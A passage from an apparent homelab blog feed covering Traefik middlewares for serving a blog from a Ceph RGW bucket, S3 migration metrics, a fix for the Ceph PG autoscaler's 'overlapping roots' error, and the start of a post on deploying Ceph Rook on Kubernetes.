</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-amz-headers</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>At the top, I&rsquo;m setting up DNS for the blog. This is only used internally. The
target is my internal fortress host, the only one reachable externally.</p>
<p>Then I specify the entry point as my DMZ entry point, the only port that the
DMZ can reach on the inside.</p>
<p>The rule itself is not too interesting, as the meat of the setup is found in
the middlewares. They look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-blogs-bucket</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">addPrefix</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prefix</span>: <span style="color:#ae81ff">/the-blogs-bucket</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-index</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replacePathRegex</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">(.*)(?:\/$|(\/[^\.\/]*)$)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">${1}${2}/index.html</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-amz-headers</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">headers</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">customResponseHeaders</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-meta-s3cmd-attrs</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-request-id</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-storage-class</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-rgw-object-type</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>The first one, <code>my-blogs-bucket</code>, is a simple rewrite rule, which adds the
bucket&rsquo;s name to the URL right after the root. This turns a URL like
<code>/posts/k8s-migration-5-s3-buckets/</code> into <code>/the-blogs-bucket/posts/k8s-migration-5-s3-buckets/</code>.
But with that, there&rsquo;s still no HTML file. And Traefik, being mainly a proxy,
not a webserver, doesn&rsquo;t have any tricks to automatically add an index file.</p>
<p>This problem is solved by the second Middleware, <code>blog-index</code>. It takes the path
and appends <code>/index.html</code> to it. But only if the path ends on a <code>/</code>. But even
that is not enough. Because some browsers seem to actively remove a <code>/</code> at the
end of a URL? That&rsquo;s what the second part does. It makes sure that all paths
which don&rsquo;t lead to a file are also appended with <code>/index.html</code>, even when they
don&rsquo;t end on <code>/</code>.</p>
<p>The last middleware, <code>blog-amz-headers</code>, just removes some S3 headers which
Ceph&rsquo;s RGW tacks on by default, and which really don&rsquo;t need to leave my network.</p>
<p>And that&rsquo;s it for the migrations. There were a couple of other utility buckets,
but they really aren&rsquo;t that interesting. Instead, let&rsquo;s go for some pretty
plots. &#x1f913;</p>
<h1 id="metrics">Metrics</h1>
<p>The first thing to note is that my transfer speed from a bucket on the old cluster
to the new cluster with <code>mc cp -a --recursive</code> capped out at around 50MiB/s.
This is way below line speed of my 1GB/s network. My disk IO on the receiving
Ceph hosts was around 80%, with about 55MB/s writes.</p>
<p>At first, I wasn&rsquo;t able to find the bottleneck. My command and control host,
where I was running the <code>mc cp</code> command, only showed about 400Mbit/s worth of transfers
in either direction. But then I recalled the network path, which looks something
like this:
<figure>
    <img loading="lazy" src="s3-network.svg"
         alt="A network diagram. It shows a switch in the middle. The switch is connected via a dotted orange line and a solid blue line to the Router box. Connected to the switch via another orange dotted line is a box called &#39;C&amp;C Host&#39;. Connected via solid blue lines to the switch are also boxes labeled &#39;Ceph Host A&#39; and &#39;Ceph Host B&#39;."/> <figcaption>
            <p>Simplified view of the network.</p>
        </figcaption>
</figure>
</p>
<p>All of the involved hosts - the Ceph hosts from the two Ceph clusters and the
C&amp;C host running <code>mc cp</code> are connected to the same switch, but in different
VLANs. So to get from the C&amp;C hosts to the Ceph hosts, the data needs to go
through the router, an OPNsense box in my case. The problem is the connection
from the router to the switch. It needs to carry the same traffic twice.
First, the traffic from the source cluster goes through the LAN NIC to the router,
and then out the same NIC but on a different VLAN to the C&amp;C host. Then the C&amp;C
host sends that data right back to the router&rsquo;s LAN NIC, where it leaves again
through the same NIC on my Homelab VLAN and finally reaches the Rook Ceph host.</p>
<p>Here is an example plot of the network traffic on one of the Ceph hosts involved:
<figure>
    <img loading="lazy" src="traffic-ceph.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is traffic in Mbit/s. For about 15 minutes, rx traffic of about 450Mbit/s can be seen."/> <figcaption>
            <p>Network traffic on one of my Ceph hosts during one of the transfers.</p>
        </figcaption>
</figure>

It looks similar on all other involved hosts. Safe for one: The OPNsense box.
Here is the traffic on the NIC which almost everything in my home hangs off of.
<figure>
    <img loading="lazy" src="traffic-router.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is traffic in Mbit/s. For about 15 minutes, rx and tx traffic of about 940 Mbit/s can be seen."/> <figcaption>
            <p>Network traffic on the LAN interface of my router.</p>
        </figcaption>
</figure>

It shows the likely bottleneck. The LAN interface on my router has about 940Mbit/s
worth of traffic in both directions. Time for some network upgrades, it seems. &#x1f913;</p>
<p>Next, let&rsquo;s look at the power consumption of it all. Due to running more HW than
normal, supporting both my Nomad and k8s clusters in parallel, the power usage
of my Homelab already grew from an average of 150W to about 200W. But these
S3 transfers tacked on another 130W:
<figure>
    <img loading="lazy" src="power.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is power usage in Watts. At the beginning and end of the graph, the consumption is around 190W. In the middle, it suddenly first goes up to about 300W and then, 12 minutes later, reaches the peak of almost 330W before going down to 190W again."/> <figcaption>
            <p>Overall Homelab power consumption during one of the bucket transfers.</p>
        </figcaption>
</figure>
</p>
<p>What I&rsquo;m actually a little bit curious about: How much of that increase comes
from the switch?</p>
<p>Finally, let&rsquo;s have a short look at disk usage. On both Ceph clusters, the S3
buckets reside on HDDs, while their indexes reside on SSDs.
First, the view of one of the source cluster&rsquo;s machines:
<figure>
    <img loading="lazy" src="hdd-src-1.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here is the curve labeled &#39;sdc&#39;. It goes from 6% to around 60% and stays there for around 15 minutes before going back to 6%."/> <figcaption>
            <p>IO utilization of one of the source Ceph hosts in the transfer.</p>
        </figcaption>
</figure>

And here is the same graph for the second host in the source Ceph cluster.
<figure>
    <img loading="lazy" src="hdd-src-2.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here is the curve labeled &#39;sdb&#39;. It goes from 6% to around 50% and stays there for around 15 minutes before going back to 6%."/> <figcaption>
            <p>IO utilization of the other source Ceph hosts in the transfer.</p>
        </figcaption>
</figure>

This shows pretty nicely that reads are distributed by Ceph. Combined, both hosts
together show a read rate of about 55MB/s.</p>
<p>Finally, let&rsquo;s have a look at one of the receiving hosts in the Ceph Rook
cluster. I will only show the metrics of one of them here, because the other one
is a VM, and the IO values don&rsquo;t make too much sense.
<figure>
    <img loading="lazy" src="hdd-dest.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here are two curves, one labeled &#39;sda&#39; and one labeled &#39;sdb&#39;. Both curves increase together from almost zero. The sdb curve goes up to over 80%, while the sda curve goes up to about 20%. Both curves stay there for around 15 minutes before returning to their initial values."/> <figcaption>
            <p>IO utilization on one of the Ceph Rook destination hosts in the transfer.</p>
        </figcaption>
</figure>
</p>
<p>Here we can see that the raw data is not the only thing which needs to be written
during S3 operations. The higher curve, going up to around 80%, is the host&rsquo;s
HDD. There the actual S3 data is stored. The 20% curve is the SATA SSD in the
host, it holds the index of the S3 buckets. The writes come out to about 55MB/s
on the HDD, as expected. Surprisingly, the read and write on the SSD is almost
zero, so I&rsquo;m wondering what&rsquo;s producing the IOPS here?</p>
<p>And that concludes the &ldquo;pretty plots&rdquo; section of this post. &#x1f913;</p>
<h1 id="conclusion">Conclusion</h1>
<p>This was supposed to be a mostly mechanical action to do during the work week,
with not much thinking required. It turned into a really frustrating matter
through the difficult to debug Traefik compression issue.
And this was only half the issues I saw. The other half was created by sudden
connection loss during bucket copies. This one was solved by adding an outgoing
firewall rule, but I decided to add that to the
<a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">Cilium Load Balancer post</a>
as an update, as that&rsquo;s going to be easier on future readers.</p>
<p>But still, I&rsquo;m done now. The k8s cluster is officially load-bearing. What could
possibly go wrong, running two very different workload orchestrators, both critical
to the Homelab&rsquo;s function? &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>PG Autoscaling in Ceph Rook</title>
      <link>https://blog.mei-home.net/posts/ceph-rook-crush-rules/</link>
      <pubDate>Sun, 21 Jan 2024 21:16:58 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-rook-crush-rules/</guid>
      <description>The PG autoscaler wasn&amp;#39;t working in my rook cluster and the error messages were unhelpful</description>
      <content:encoded><![CDATA[<p>While working on some internal documentation of my <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">Rook Ceph setup</a>,
I found that my pool&rsquo;s <a href="https://docs.ceph.com/en/latest/rados/operations/placement-groups/">Placement Groups</a>
were still at size 1, even though I had transferred about 350GB of data already.</p>
<p>I have the <a href="https://docs.ceph.com/en/latest/rados/operations/placement-groups/#automated-scaling">PG Autoscaler</a>
enabled by default on all pools, so I won&rsquo;t have to have an eye on the PG counts.
But for some reason, scaling wasn&rsquo;t happening.</p>
<p>Digging into the issue, I finally found the following log lines in the MGR
logs:</p>
<pre tabindex="0"><code>pool rbd-fast won&#39;t scale due to overlapping roots: {-3, -1}
pool rbd-bulk won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool homelab-fs-metadata won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool homelab-fs-bulk won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.control won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.meta won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.log won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.index won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.non-ec won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.otp won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool .rgw.root won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.data won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool 1 contains an overlapping root -1... skipping scaling
pool 2 contains an overlapping root -3... skipping scaling
pool 3 contains an overlapping root -2... skipping scaling
pool 4 contains an overlapping root -3... skipping scaling
pool 5 contains an overlapping root -2... skipping scaling
pool 6 contains an overlapping root -3... skipping scaling
pool 7 contains an overlapping root -3... skipping scaling
pool 8 contains an overlapping root -3... skipping scaling
pool 9 contains an overlapping root -3... skipping scaling
pool 10 contains an overlapping root -3... skipping scaling
pool 11 contains an overlapping root -3... skipping scaling
pool 12 contains an overlapping root -3... skipping scaling
pool 13 contains an overlapping root -2... skipping scaling
</code></pre><p>These lines told me that almost all of my pools were suffering from overlapping
roots. Which was pretty weird to me - I was pretty sure I had none of those.</p>
<p>My CRUSH map looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush tree
</span></span><span style="display:flex;"><span>ID  CLASS  WEIGHT    TYPE NAME
</span></span><span style="display:flex;"><span>-1         13.64517  root default   
</span></span><span style="display:flex;"><span>-4          9.09679      host nakith
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0  
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1  
</span></span><span style="display:flex;"><span>-7          4.54839      host neper 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3  
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2  
</span></span></code></pre></div><p>Compare that to the errors above - the only root I could see here was <code>-1</code>,
the default root.</p>
<p>After some research, I found the principle of <em>shadow roots</em>. These can be
displayed by adding the <code>--show-shadow</code> option to the previous command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush tree --show-shadow
</span></span><span style="display:flex;"><span>ID  CLASS  WEIGHT    TYPE NAME          
</span></span><span style="display:flex;"><span>-3    ssd   2.72910  root default~ssd   
</span></span><span style="display:flex;"><span>-6    ssd   1.81940      host nakith~ssd
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1      
</span></span><span style="display:flex;"><span>-9    ssd   0.90970      host neper~ssd 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2      
</span></span><span style="display:flex;"><span>-2    hdd  10.91608  root default~hdd   
</span></span><span style="display:flex;"><span>-5    hdd   7.27739      host nakith~hdd
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0      
</span></span><span style="display:flex;"><span>-8    hdd   3.63869      host neper~hdd 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3      
</span></span><span style="display:flex;"><span>-1         13.64517  root default       
</span></span><span style="display:flex;"><span>-4          9.09679      host nakith    
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0      
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1      
</span></span><span style="display:flex;"><span>-7          4.54839      host neper     
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3      
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2      
</span></span></code></pre></div><p>Now I saw all of the roots. By I still wasn&rsquo;t getting where the overlapping
roots were coming from. So I took a closer look at one of the mentioned pools,
<code>rbd-fast</code>, which should be restricted to SSDs only. First, the pool info
on it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd pool get rbd-fast crush_rule
</span></span><span style="display:flex;"><span>crush_rule: rbd-fast_host_ssd
</span></span></code></pre></div><p>Then looking closer at that rule:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule dump rbd-fast_host_ssd
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_id&#34;</span>: 2,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_name&#34;</span>: <span style="color:#e6db74">&#34;rbd-fast_host_ssd&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;type&#34;</span>: 1,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;steps&#34;</span>: <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;take&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item&#34;</span>: -3,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item_name&#34;</span>: <span style="color:#e6db74">&#34;default~ssd&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;chooseleaf_firstn&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;num&#34;</span>: 0,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;host&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;emit&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>So, this also looks perfectly fine. I googled and googled and read through the
Ceph docs. But I couldn&rsquo;t really find anything. I found some things which
talked about the <code>.mgr</code> pool, but that was the one pool which didn&rsquo;t appear in
the error messages from the MGR daemon above.</p>
<p>But it still was the problem. Even though the autoscaler complained explicitly
about all the other pools, claiming they had overlapping roots, the only pool
which actually had those overlaps was the <code>.mgr</code> pool - the only one which did
<strong>NOT</strong> produce an error log line!</p>
<p>So what does the crush rule for this pool look like?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd pool get .mgr crush_rule
</span></span><span style="display:flex;"><span>replicated_rule
</span></span></code></pre></div><p>And that <code>replicated_rule</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule dump replicated_rule
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_id&#34;</span>: 0,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_name&#34;</span>: <span style="color:#e6db74">&#34;replicated_rule&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;type&#34;</span>: 1,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;steps&#34;</span>: <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;take&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item&#34;</span>: -1,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item_name&#34;</span>: <span style="color:#e6db74">&#34;default&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;chooseleaf_firstn&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;num&#34;</span>: 0,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;host&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;emit&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>So yes, this rule will actually take OSDs from different roots, namely both
the SSD and HDD roots. Which, you know, Ceph could have been <em>a lot</em> clearer
about.
I finally realized that this is the problem from <a href="https://forum.proxmox.com/threads/ceph-overlapping-roots.104199/">this post</a>
in the Proxmox forums.</p>
<p>So to fix this, the <code>.mgr</code> pool also needs to get a CRUSH rule which assigns
a specific device class. I did it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule create-replicated replicated-mgr default host ssd
</span></span><span style="display:flex;"><span>ceph osd pool set .mgr crush_rule replicated-mgr
</span></span></code></pre></div><p>This creates a replicated CRUSH rule, with a failure domain of <code>host</code> and
assigning objects to SSDs.</p>
<p>And with that, the autoscaler immediately fired up and increased the PG counts
on my pools. &#x1f612;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 4: Storage with Ceph Rook</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/</link>
      <pubDate>Thu, 11 Jan 2024 00:15:01 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/</guid>
      <description>Setting up a Ceph cluster on Kubernetes with Rook</description>
      <content:encoded><![CDATA[<p>Wherein I talk about the setup of Ceph Rook on my k8s cluster.</p>
<p>This is part five of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="the-current-setup">The current setup</h1>
<p><a href="https://blog.mei-home.net/posts/homelab-2022/storage/">I&rsquo;ve been running Ceph as my storage layer for quite a while now</a>.
In my current Nomad setup, it provides volumes for my jobs as well as S3 for those
apps which support it.
In addition, most of my Raspberry Pis are diskless, netbooting off of Ceph&rsquo;s
RBD block devices as their root.
At first glance, <a href="https://ceph.io/en/">Ceph</a> might look like you&rsquo;d need an Ops
team of at least three people to run it. But after the initial setup, I&rsquo;ve found
it to be very low maintenance. Adding additional disks or entire additional
hosts is very low effort.
I went through the following stages, with the exact same cluster, without any
outages or cluster recreation:</p>
<ol>
<li>Baremetal on my single homelab server - bad idea, as that server also needed
to mount Ceph disks</li>
<li>On a single VM on that same server</li>
<li>Spread over four LXD VMs on that server</li>
<li>Spread over three LXD VMs on that server and a Raspberry Pi CM4 in an IO board
with a SATA card attached</li>
<li>My current config, with three dedicated baremetal machines</li>
</ol>
<p>Before I started my migration, I had a setup with three x86 hosts, each with
one 1TB SATA SSD and one 4TB HDD. Overall, I was using only about 40% of that
storage. I then had several pools configured, each with a replication factor of
&ldquo;2&rdquo;. This works pretty much like a RAID1 setup, where all data is mirrored on
two disks. Or, in my case, on two different hosts even. This allows me to reboot
any of my hosts without any outages, as I&rsquo;ve configured Ceph to be okay with
only one replica when a host is down.</p>
<p>For the migration, I took out my emergency replacement HDD and SSD and put them
into my LXD VM host to create another VM with those two drives. I then also took
one of my baremetal hosts out of my baremetal cluster for later addition to the
Kubernetes cluster.</p>
<p>All of this allowed me to keep my baremetal cluster running without interruption,
continuing to supply my Nomad cluster with storage, while I have a whole separate,
<a href="https://rook.io/docs/rook/latest-release/">Ceph Rook</a> based cluster for the
migration. Once I&rsquo;m done with the migration, I will add the two other baremetal
hosts to the Rook cluster and remove the Ceph VM.</p>
<p>I got pretty lucky that I happen to have enough HW and disks laying
around to be able to afford two clusters. It&rsquo;s what allows me to do this migration
at my own pace, iteratively. I&rsquo;m really enjoying that there&rsquo;s no pressure to
finish the migration and I can go on detours like my recent implementation of
<code>LoadBalancer</code> services with Cilium.</p>
<h1 id="why-rook">Why Rook</h1>
<p>So, considering how happy I am with baremetal Ceph, why switch to Rook? First it
is of course some portion of just wanting to try something new. Then there&rsquo;s the
idea of having what&rsquo;s called a <em>hyperconverged</em> infrastructure. With running
Ceph on Kubernetes instead of stand-alone, I can also run other workloads on
those hosts, which are idling for a lot of the time in the current setup.
It allows me to use my
resources more efficiently. I&rsquo;m not implementing this right now, having added
a <code>NoSchedule</code> taint to my Ceph hosts. This is mostly because I&rsquo;m still unsure
of the behavior when I have to take the entire cluster down. Most of my services
will need Ceph, but they might get scheduled before the Ceph pods, on the Ceph
hosts.
I understand that I can work with <code>PriorityClass</code> here, but I have not gotten
to wrapping my head around that.</p>
<p>Another really important point: Ceph Rook is very declarative, as you&rsquo;ll see
shortly. Baremetal Ceph with Cephadm, on the other hand, is mostly invoking
commands by hand. There are no good ways to version control my Ceph cluster
setup at the moment. I&rsquo;ve had to keep meticulous notes about the commands I
need to execute.</p>
<p>But Rook is not all milk and honey. Rook can, for example, not use the same
pool for multiple storage types. A pool is either only for RBD, CephFS or RGW usage. No
mixing. So I will have to create multiple pools. In my current setup, I just
have a generic <code>bulk</code> and <code>fast</code> pool, with HDDs and SSDs respectively. Those
are then used for all three storage applications.
Furthermore, Ceph&rsquo;s dashboard does not support Rook as an orchestrator very well
right now. Several pieces of information I can see in my baremetal dashboard
are &ldquo;N/A&rdquo; on the Rook Ceph dashboard.</p>
<p>Here is an example:</p>
<figure>
    <img loading="lazy" src="host-list.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. The selected tab is &#39;Hosts List&#39;. In the table, the colums &#39;Hostname&#39; and &#39;Service Instances&#39; are blurred. The only column with actual content, &#39;Status&#39;, shows &#39;Available&#39; for all lines. There are additional columns, all showing &#39;N/A&#39; for all lines: &#39;Model&#39;, &#39;CPUs&#39;, &#39;Cores&#39;, &#39;Total Memory&#39;, &#39;Raw Capacity&#39;, &#39;HDDs&#39;, &#39;Flash&#39;, &#39;NICs&#39;."/> <figcaption>
            <p>The Host List of the Ceph Dashboard. No information at all is shown about any of the nodes.</p>
        </figcaption>
</figure>

<p>The dashboard data is pretty useless, with not showing any HW data about the hosts.
It looks similarly in the <code>Services</code> overview, which shows completely wrong
service counts. At least the <code>OSD</code> overview is entirely correct. The same is
true for the <code>Pools</code>, <code>Block</code> and <code>File Systems</code> UIs. But the Ceph RGW/S3 UI
is just not supported at all. Even with RGWs deployed and working, the dashboard
shows me that RGW access failed.</p>
<p>The problems with the dashboard are known and are currently being worked on by
the Rook maintainers. It also isn&rsquo;t a pure dashboard problem, but the same problem
occurs for the data visible via <code>ceph orch ps</code>, where the columns <code>Ports</code>, <code>Mem Use</code>
and <code>Mem Lim</code> are empty, and the <code>Version</code> column just shows <code>&lt;unknown&gt;</code>.
Not great to be honest, but I assume this kind of info just didn&rsquo;t seem too
urgent, because it is also available directly via Kubernetes.</p>
<p>Finally, one rather sad point: There&rsquo;s no official migration path between Ceph
baremetal and Ceph Rook. Yes, there&rsquo;s some wild guides floating around, but
I don&rsquo;t trust any of them with my data, as they all invariably contain some
variation of &ldquo;after you&rsquo;ve finished fuzzing around with the cluster ID&hellip;&rdquo;.</p>
<p>So what I&rsquo;ll do instead is manual migrations. I still have to look into Ceph RBD
import/export. I also thought about using Ceph&rsquo;s mirroring features, but the
setup of that between the baremetal and Rook clusters doesn&rsquo;t really look worth
it. So it will likely just come down to mounting both volumes on one host and
